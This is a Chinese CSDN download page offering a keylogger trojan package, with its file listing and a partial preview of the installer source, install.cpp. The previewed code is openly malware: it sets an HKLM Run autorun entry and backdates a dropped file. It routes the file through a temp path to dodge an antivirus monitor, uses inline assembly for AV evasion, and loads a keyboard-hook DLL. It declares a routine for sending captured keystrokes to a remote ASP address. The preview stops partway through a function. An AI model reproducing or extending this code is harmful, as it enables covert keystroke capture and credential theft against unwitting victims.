键盘记录木马样例，支持asp收信_python实现键盘记录木马资源-CSDN文库

共50个文件

h：13个

cpp：7个

rc：5个

键盘记录

5星 · 超过95%的资源需积分: 10 44 浏览量 2011-01-02 02:15:51 上传评论 1 收藏 83KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

keyboardhookdev.rar （50个子文件）

keyboardhookdev

test.asp 247B

Include

MYMALLOC.h 11KB

mysocket.h 7KB

main

main.cpp 10KB

main.h 2KB

resource.h 866B

main.dsp 4KB

main.rc.2 2KB

main.dev 2KB

1.cpp 3KB

工程1.dev 1KB

Debug

main.rc 2KB

main_private.rc 92B

main.dsw 514B

main.o 21KB

1.o 1KB

Release

clear.BAT 314B

工程1_private.h 572B

res

1.ico 766B

keyboard.ico 766B

main_private.h 587B

main.opt 48KB

Makefile.win 1KB

keyboardhook.opt 59KB

keyboardhook.dsw 910B

g_Define.h 3KB

g_Define.cpp 2B

clear.BAT 349B

BIN

HOOK

StdAfx.cpp 291B

resource.h 450B

HOOK.cpp 7KB

hook.def 79B

HOOK.H 767B

HOOK.dsw 533B

Debug

HOOK.dev 2KB

StdAfx.h 802B

HOOK.dsp 4KB

Makefile.win 1KB

install

StdAfx.cpp 294B

resource.h 529B

install.dsp 4KB

install.cpp 15KB

install_private.h 602B

Debug

install.rc 2KB

StdAfx.h 771B

install.dev 2KB

Release

res

HOOK.dll 72KB

Script1.rc 3KB

install_private.rc 95B

Makefile.win 1KB

// install.cpp : Defines the entry point for the application. #include "StdAfx.h" #include "resource.h" #include <windows.h> #include <Shlwapi.h> #include "../g_Define.h" //#define DEVCPP //使用DEVCPP编译 //#define DEBUG //调试 /***********Custom add-in libraries*******/ #pragma comment (lib,"kernel32.lib") #pragma comment (lib,"shell32.lib") #pragma comment (lib,"user32.lib") #pragma comment (lib,"MSVCRT.lib") #pragma comment (lib, "NetApi32.lib") #pragma comment (linker, "/OPT:NOWIN98") const char * szObjName = "test"; const char * szAutoRunKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; class CInstall { public: static void QuitProcess(); static char m_szConfigString[MAX_CONFIG_LEN]; static BOOL m_bIsNowSysDir; static void InitHook(); static void InitMouse(); //让启动漏斗消失 static void UnHook(); static void RunOnce(); static BOOL SendData(void); static BOOL GetConfigString(char *pBuffer); static BOOL ForceCopyToFile(char * szOldFileName,char *szNewFileName); //以下需动态分配内存 static char *m_pAllocRunCmdLine; static char *m_pAllocDllPath; static char *m_pAllocSelfPath; static char *m_pAllocSysDir; static char *m_pAllocNewFile; //指针 static char *m_pAspAddress; static char m_szSendTime[3]; // static HINSTANCE m_hDll; static BOOL m_bIsHook; static int m_iSendSecond; //发信时间 }; char *CInstall::m_pAllocSelfPath = NULL; char *CInstall::m_pAllocSysDir = NULL; char *CInstall::m_pAllocNewFile = NULL; char *CInstall::m_pAllocDllPath = NULL; char *CInstall::m_pAllocRunCmdLine = NULL; char *CInstall::m_pAspAddress = NULL; BOOL CInstall::m_bIsNowSysDir = FALSE; HINSTANCE CInstall::m_hDll = NULL; BOOL CInstall::m_bIsHook = FALSE; int CInstall::m_iSendSecond = 10; //默认10 min char CInstall::m_szConfigString[MAX_CONFIG_LEN] = {0}; char CInstall::m_szSendTime[3] = {0}; #ifdef DEBUG char Dbg_szConfigString[MAX_CONFIG_LEN]= "\0"; MyDbg Dbg(TRUE); CInstall Dbg_Install; void Watch(const char *lpStrName,const char *lpStrVal) { FILE *fpLog=fopen("install.log","a+"); if(!fpLog) { MessageBoxA(0,"退出","",0); exit(0); } fprintf(fpLog,"%s:\"%s\"\n",lpStrName,lpStrVal); fclose(fpLog); } void TestSendData() { FILE *fpTest = fopen(SAVE_FILE_NAME,"w"); fprintf(fpTest,"123456789end\n"); fclose(fpTest); CInstall::SendData(); } #else MyDbg Dbg(FALSE); #endif //////////////////////// int MemFind(const char *pMemStart, const char *pStrToFind, int iMaxFindLen, int iLenOfStr) { int da,i,j; if (iLenOfStr == 0) da = strlen(pStrToFind); else da = iLenOfStr; for (i = 0; i < iMaxFindLen; i++) { for (j = 0; j < da; j ++) if (pMemStart[i+j] != pStrToFind[j]) break; if (j == da) return i; } return -1; } BOOL ReleaseRes(HMODULE hModule, WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName) { //从模块hModule 释放资源wResourceID,资源类型为lpType， //释放路径为lpFileName HGLOBAL hRes; HRSRC hResInfo; HANDLE hFile; DWORD dwBytes; char szTmpPath[MAX_PATH]; char szBinPath[MAX_PATH]; // 一定要跟别的区分开，GetTickCount有可能得到一样的值 GetTempPath(sizeof(szTmpPath), szTmpPath); wsprintf(szBinPath, "%s\\%d_res.tmp", szTmpPath, GetTickCount()); hResInfo = FindResource(hModule, MAKEINTRESOURCE(wResourceID), lpType); if (hResInfo == NULL) return FALSE; hRes = LoadResource(hModule, hResInfo); if (hRes == NULL) return FALSE; hFile = CreateFile ( szBinPath, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); if (hFile == NULL) return FALSE; SYSTEMTIME SysTime; memset(&SysTime, 0, sizeof(SysTime)); SysTime.wYear = 2004; SysTime.wMonth = 8; SysTime.wDay = 17; SysTime.wHour = 20; SysTime.wMinute = 0; FILETIME FileTime,LocalFileTime; SystemTimeToFileTime(&SysTime, &FileTime); LocalFileTimeToFileTime(&FileTime,&LocalFileTime); SetFileTime(hFile, &LocalFileTime, (LPFILETIME) NULL, &LocalFileTime); WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL); CloseHandle(hFile); FreeResource(hRes); //Fuck KV File Create Monitor MoveFile(szBinPath, lpFileName); //SetFileAttributes(lpFileName, FILE_ATTRIBUTE_HIDDEN); DeleteFile(szBinPath); return TRUE; } void SetAutoRun(const char *szFilePath,const char *szDisplayName) { // FILE *fpInstallLog; HKEY hRunKey = NULL; TCHAR lpszQuery[MAX_PATH]; LONG iRet = 0; DWORD dwtype = REG_SZ; unsigned long dwStrCb = 128; iRet = RegOpenKeyEx( HKEY_LOCAL_MACHINE, szAutoRunKey, 0, KEY_WRITE|KEY_READ, &hRunKey ); iRet = RegQueryValueEx( hRunKey, szDisplayName, NULL, &dwtype, (LPBYTE)lpszQuery, &dwStrCb ); if( (iRet==ERROR_SUCCESS) && (strcmp(lpszQuery,szFilePath) != 0) ) { //删除旧键值 RegDeleteKey(hRunKey,szDisplayName); iRet = -1L; } if (iRet != ERROR_SUCCESS) { //第一次运行 RegSetValueEx( hRunKey, szDisplayName, 0, REG_SZ, (const unsigned char *)szFilePath, (strlen(szFilePath)+1) * sizeof(TCHAR) ); } //关闭打开的键值。 if (hRunKey != NULL) { RegCloseKey(hRunKey); } } BOOL CInstall::ForceCopyToFile(char * szOldFileName,char *szNewFileName) { /* 有必要的话可以添加一些操作，达到强制复制文件szOldFileName到szNewFileName */ return CopyFile(szOldFileName,szNewFileName,0); } void CInstall::InitMouse() { //让启动漏斗消失 void *pGetInputState = (void *)GetInputState; DWORD dwThreadId = GetCurrentThreadId(); void *pPostThreadMessage = (void *)PostThreadMessage; #ifndef DEVCPP //非devcpp编译（vc） __asm { //以此免杀 call pGetInputState; push 0; push 0; push 0; push dwThreadId; call pPostThreadMessage; } #else GetInputState(); PostThreadMessage(dwThreadId,0,0,0); #endif MSG msg; GetMessage(&msg, 0, 0, 0); } BOOL CInstall::GetConfigString(char *pBuffer) { int iRet = 0; FILE *fpSelf = fopen(CInstall::m_pAllocSelfPath,"rb"); if(fpSelf == NULL) { MsgBox("无法打开！"); } fseek(fpSelf,-1 * MAX_CONFIG_LEN,SEEK_END); iRet = fread(CInstall::m_szConfigString,1,MAX_CONFIG_LEN,fpSelf); if(iRet == 0) MsgBox("读取出错！"); fclose(fpSelf); iRet = MemFind( CInstall::m_szConfigString, CONFIG_START, MAX_CONFIG_LEN, strlen(CONFIG_START) ); strcpy(CInstall::m_szConfigString,CInstall::m_szConfigString + iRet); return TRUE; } void CInstall::InitHook() { __stdcall_i_pFun_v fpHook = NULL; CInstall::m_hDll = LoadLibrary(DLL_FILE_NAME); if(CInstall::m_hDll == NULL) { MessageBox(0,"找不到DLL!","出错了！",MB_ICONERROR); return; } fpHook = (__stdcall_i_pFun_v)GetProcAddress(CInstall::m_hDll,"InstallHOOK"); if(fpHook != NULL) { fpHook(); Dbg.OutMsg("InitHook Succeed!"); CInstall::m_bIsHook = TRUE; } } void CInstall::RunOnce() { DWORD dwLastError; HANDLE hMutex = CreateMutex( NULL, //无安全描述 false, //没有所有者 szObjName ); //对象名 if(hMutex == NULL) { //hMutex为NULL标示创建失败 MessageBox(NULL,"CreateMutex error!",NULL,MB_OK); exit(0); } dwLastError = GetLastError(); // 普通权限访问系统权限创建的Mutex,如果存在，如果存在就返回拒绝访问的错误 // 已经安装过一个一模一样配置的，就不安装了 if (dwLastError == ERROR_ALREADY_EXISTS || dwLastError == ERROR_ACCESS_DENIED) {

评论收藏

内容反馈